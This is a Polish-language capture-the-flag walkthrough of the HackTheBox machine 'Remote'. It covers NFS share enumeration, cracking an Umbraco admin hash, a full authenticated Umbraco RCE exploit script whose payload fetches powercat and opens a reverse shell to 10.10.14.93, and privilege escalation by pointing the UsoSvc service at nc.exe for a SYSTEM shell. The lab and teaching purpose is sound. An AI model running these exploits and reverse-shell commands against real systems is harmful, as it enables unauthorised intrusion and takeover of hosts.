Remote

NMAP

nmap -sC -sV -T5 -p- 10.10.10.180
PORT      STATE SERVICE       REASON          VERSION
21/tcp    open  ftp           syn-ack ttl 127 Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp    open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp   open  rpcbind       syn-ack ttl 127 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds? syn-ack ttl 127
2049/tcp  open  mountd        syn-ack ttl 127 1-3 (RPC #100005)
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49678/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49679/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49680/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 3m18s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-05-13T13:16:34
|_  start_date: N/A

USER

Warto spojrzeć na usługi takie jak:
FTP
HTTP
NFS

ftp 10.10.10.180
Connected to 10.10.10.180.
220 Microsoft FTP Service
Name (10.10.10.180:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp> pwd
257 "/" is current directory.

Nic ciekawego szukamy dalej.
Może sprawdzimy czy jest coś na NFS

showmount -e 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)

Jak widać są jakieś zasoby sieciowe udostępnione więc warto do nich zajrzeć

mount -t nfs -o vers=2 10.10.10.180:/site_backups /mnt/tmp
ls -la
razem 22
drwx------ 2 4294967294 4294967294  4096 maj 14 04:48 .
drwxr-xr-x 6 root       root        4096 maj 14 11:08 ..
drwx------ 2 4294967294 4294967294    64 lut 20 17:16 App_Browsers
drwx------ 2 4294967294 4294967294  4096 lut 20 17:17 App_Data
drwx------ 2 4294967294 4294967294  4096 lut 20 17:16 App_Plugins
drwx------ 2 4294967294 4294967294    64 lut 20 17:16 aspnet_client
drwx------ 2 4294967294 4294967294 49152 lut 20 17:16 bin
drwx------ 2 4294967294 4294967294  8192 lut 20 17:16 Config
drwx------ 2 4294967294 4294967294    64 lut 20 17:16 css
-rwx------ 1 4294967294 4294967294   152 lis  1  2018 default.aspx
-rwx------ 1 4294967294 4294967294    89 lis  1  2018 Global.asax
drwx------ 2 4294967294 4294967294  4096 lut 20 17:16 Media
drwx------ 2 4294967294 4294967294    64 lut 20 17:16 scripts
drwx------ 2 4294967294 4294967294  8192 lut 20 17:16 Umbraco
drwx------ 2 4294967294 4294967294  4096 lut 20 17:16 Umbraco_Client
drwx------ 2 4294967294 4294967294  4096 lut 20 17:16 Views
-rwx------ 1 4294967294 4294967294 28539 lut 20 05:57 Web.config

Jest bardzo dużo plików do przejrzenia,
lepiej przeszukać folder pod kątem słów kluczowych np. user, admin, pass, username, password…

find . -type f -exec grep -l "admin" {} \; 
./App_Data/Logs/UmbracoTraceLog.intranet.txt
./App_Data/Logs/UmbracoTraceLog.intranet.txt.2020-02-19
./App_Data/Logs/UmbracoTraceLog.remote.txt
./App_Data/TEMP/ExamineIndexes/External/Index/_a.fdt
...
./App_Data/TEMP/ExamineIndexes/Internal/Index/_e.cfs
./App_Data/umbraco.config
./App_Data/Umbraco.sdf
./App_Plugins/Terratype/readme.txt
./App_Plugins/Terratype.GoogleMapsV3/Scripts/Terratype.GoogleMapsV3.js
./bin/businesslogic.xml
./bin/cms.dll
./bin/log4net.xml
./bin/System.Web.Helpers.dll
./bin/Umbraco.Core.xml
./bin/umbraco.xml
./Config/Dashboard.config
./Umbraco/Config/Lang/cs.xml
...

Trochę to skróciłem, ponieważ interesujące nas informacje są w plikach powyżej.

cat ./App_Data/Logs/UmbracoTraceLog.intranet.txt | grep admin
2020-02-20 00:12:13,455 [P4408/D19/T40] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt succeeded for username admin@htb.local from IP address 192.168.195.1
cat ./App_Data/Umbraco.sdf | strings | grep admin
Administratoradmindefaulten-US
Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/password/changepassword change
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "smith" <smith@htb.local>umbraco/user/saveupdating SessionTimeout, SecurityStamp, CreateDate, UpdateDate, Id, HasIdentity

Te dane są trochę mało czytelne, ale po uporządkowaniu widać login i hash

admin@htb.local
b8be16afba8c314ad33d812f22a04991b90e2aaa

Traktujemy hash’a JohnTheRipper’em

john --wordlist=/usr/share/wordlists/rockyou.txt hash
...
baconandcheese

Mamy hasło dla użytkownika admin.
Na exploit-db jest gotowy exploit RCE do użycia tylko potrzebne były dane logowania
https://www.exploit-db.com/exploits/46153

Do tego spróbujemy ściągnąć powercat’a i i zrobić reverseshella

# Exploit Title: Umbraco CMS - Remote Code Execution by authenticated administrators
# Dork: N/A
# Date: 2019-01-13
# Exploit Author: Gregory DRAPERI & Hugo BOUTINON
# Vendor Homepage: http://www.umbraco.com/
# Software Link: https://our.umbraco.com/download/releases
# Version: 7.12.4
# Category: Webapps
# Tested on: Windows IIS
# CVE: N/A


import requests;

from bs4 import BeautifulSoup;

def print_dict(dico):
    print(dico.items());
    
print("Start");

# Execute a calc for the PoC
payload = '''<?xml version="1.0"?><xsl:stylesheet version="1.0" \
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \
xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">\
<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \
{ string cmd = "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.93/powercat.ps1'); powercat -c 10.10.14.93 -p 9090 -e cmd -v";\
 System.Diagnostics.Process proc = new System.Diagnostics.Process();\
 proc.StartInfo.FileName = "powershell.exe"; proc.StartInfo.Arguments = cmd;\
 proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
 proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
 </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/>\
 </xsl:template> </xsl:stylesheet> ''';

login = "admin@htb.local";
password="baconandcheese";
host = "http://10.10.10.180";

# Step 1 - Get Main page
s = requests.session()
url_main =host+"/umbraco/";
r1 = s.get(url_main);
print_dict(r1.cookies);

# Step 2 - Process Login
url_login = host+"/umbraco/backoffice/UmbracoApi/Authentication/PostLogin";
loginfo = {"username":login,"password":password};
r2 = s.post(url_login,json=loginfo);

# Step 3 - Go to vulnerable web page
url_xslt = host+"/umbraco/developer/Xslt/xsltVisualize.aspx";
r3 = s.get(url_xslt);

soup = BeautifulSoup(r3.text, 'html.parser');
VIEWSTATE = soup.find(id="__VIEWSTATE")['value'];
VIEWSTATEGENERATOR = soup.find(id="__VIEWSTATEGENERATOR")['value'];
UMBXSRFTOKEN = s.cookies['UMB-XSRF-TOKEN'];
headers = {'UMB-XSRF-TOKEN':UMBXSRFTOKEN};
data = {"__EVENTTARGET":"","__EVENTARGUMENT":"","__VIEWSTATE":VIEWSTATE,"__VIEWSTATEGENERATOR":VIEWSTATEGENERATOR,"ctl00$body$xsltSelection":payload,"ctl00$body$contentPicker$ContentIdValue":"","ctl00$body$visualizeDo":"Visualize+XSLT"};

# Step 4 - Launch the attack
r4 = s.post(url_xslt,data=data,headers=headers);

print("End");
c:\Users>tree /a

Folder PATH listing
Volume serial number is BE23-EB3E
C:.
+---.NET v2.0
+---.NET v2.0 Classic
+---.NET v4.5
+---.NET v4.5 Classic
+---Administrator
+---Classic .NET AppPool
\---Public
    +---Documents
    +---Downloads
    +---Music
    +---Pictures
    \---Videos
c:\Users\Public>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is BE23-EB3E

 Directory of c:\Users\Public

02/20/2020  03:42 AM    <DIR>          .
02/20/2020  03:42 AM    <DIR>          ..
02/19/2020  04:03 PM    <DIR>          Documents
09/15/2018  03:19 AM    <DIR>          Downloads
09/15/2018  03:19 AM    <DIR>          Music
09/15/2018  03:19 AM    <DIR>          Pictures
05/14/2020  07:35 AM                34 user.txt
09/15/2018  03:19 AM    <DIR>          Videos
               1 File(s)             34 bytes
               7 Dir(s)  19,409,895,424 bytes free

Mamy usera

type user.txt
7f64057cce50923213270460b4224c2f

ROOT

Ściągamy privescCheck żeby sprawdzić co jest ciekawego

powershell "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.93/Invoke-PrivescCheck.ps1') ; Invoke-PrivescCheck"

+------+------------------------------------------------+------+
| TEST | SERVICES > Service Permissions                 | VULN |
+------+------------------------------------------------+------+
| DESC | Checks for services which are modifiable through the  |
|      | Service Control Manager (sc.exe config VulnService bi |
|      | npath= C:\Temp\evil.exe).                             |
+------+-------------------------------------------------------+
[+] Found 1 vulnerable service(s).


Name           : UsoSvc
ImagePath      : C:\Windows\system32\svchost.exe -k netsvcs -p
User           : LocalSystem
Status         : Running
UserCanStart   : True
UserCanRestart : True

Stary sposób na zmianę ImagePath i zrestartowanie serwisu.
Miałem problemy z uruchomieniem powershell’a więc ściągnąłem sobie to TEMP’a nc.exe

powershell
Invoke-WebRequest -Uri "http://10.10.14.93/nc.exe" -OutFile "C:\windows\temp\nc.exe"
sc config UsoSvc binpath="c:/windows/temp/nc.exe 10.10.14.93 9091 -e cmd.exe"
sc stop UsoSvc
sc start UsoSvc

Mamy roota

type root.txt
7c9b7e83bd1b5b5062a686de107a035d

Leave a Comment